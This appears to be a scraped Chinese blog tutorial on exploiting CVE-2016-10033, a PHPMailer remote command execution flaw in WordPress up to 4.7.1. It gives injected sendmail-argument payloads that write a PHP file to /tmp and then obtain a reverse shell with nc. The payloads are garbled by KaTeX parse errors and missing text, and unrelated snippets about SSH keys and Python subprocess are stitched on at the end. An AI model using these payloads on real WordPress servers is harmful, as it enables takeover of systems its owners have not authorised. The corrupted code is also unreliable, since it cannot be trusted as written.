WordPress遠端命令執行

2021-09-29 15:45:38 字數 1451 閱讀 7821

漏洞編號:cve-2016-10033

漏洞簡述:wordpress 4.6 版本遠端**執行漏洞是乙個非常嚴重的漏洞,未經授權的攻擊者利用該漏洞就能實現遠端**執行,針對目標伺服器實現即時訪問,最終導致目標應用伺服器的完全陷落。

影響版本:wordpress <= 4.7.1

檢視主要的漏洞**可以找到class.phpmailer.php

1、開啟burp進行抓包:

2、可以構造payload如下,該payload在/tmp/目錄下建立1.php檔案:

轉換後的payload:

aa(any -froot@localhost -be katex parse error: expected '}', got 'eof' at end of input: ' at position 16: spool_directory}̲}bin' at position 16: spool_directory}̲}touch' at position 8: tod_log}̲}' at position 16: spool_directory}̲}tmp}1.php}} null)

*注意:生成的檔案是在docker容器中生成,因此要在docker中尋找:

發現shell

4、找到shell在裡面填入以下內容:

之後先監聽埠之後執行即可獲得shell

aa(any -froot@localhost -be $} null)

轉換aa(any -froot@localhost -be katex parse error: expected '}', got 'eof' at end of input: ' at position 16: spool_directory}̲}bin' at position 16: spool_directory}̲}bash' at position 8: tod_log}̲}' at position 16: spool_directory}̲}tmp}shell}} null)

利用nc:

本人剛入csdn 也是萌新如果**不對還請各位大佬多多包涵並指教謝謝

遠端執行命令

遠端執行命令 這個分兩步,很簡單很實用。第一步,設定ssh免認證,免認證就是只不用密碼認證就可以直接登入,這在寫指令碼伺服器控制時特別有用。ssh keygen t rsa cd ssh ssh copy id xuexi01注 xuexi01是主機名,也可寫成ip,如192.168.2.11 第二...

遠端執行命令

一 需求 server 下發命令 client 執行命令 ssh協議 import os ret os.popen ls read print ret import subprocess 內建模組 和os模組的功能有相似之處 能執行作業系統的命令的功能 ret subprocess.popen di...

遠端執行命令

伺服器 遠端執行命令 from socket import import subprocess ip port 127.0.0.1 8080 back log 5buffer size 1024tcp server socket af inet,sock stream tcp server.bind...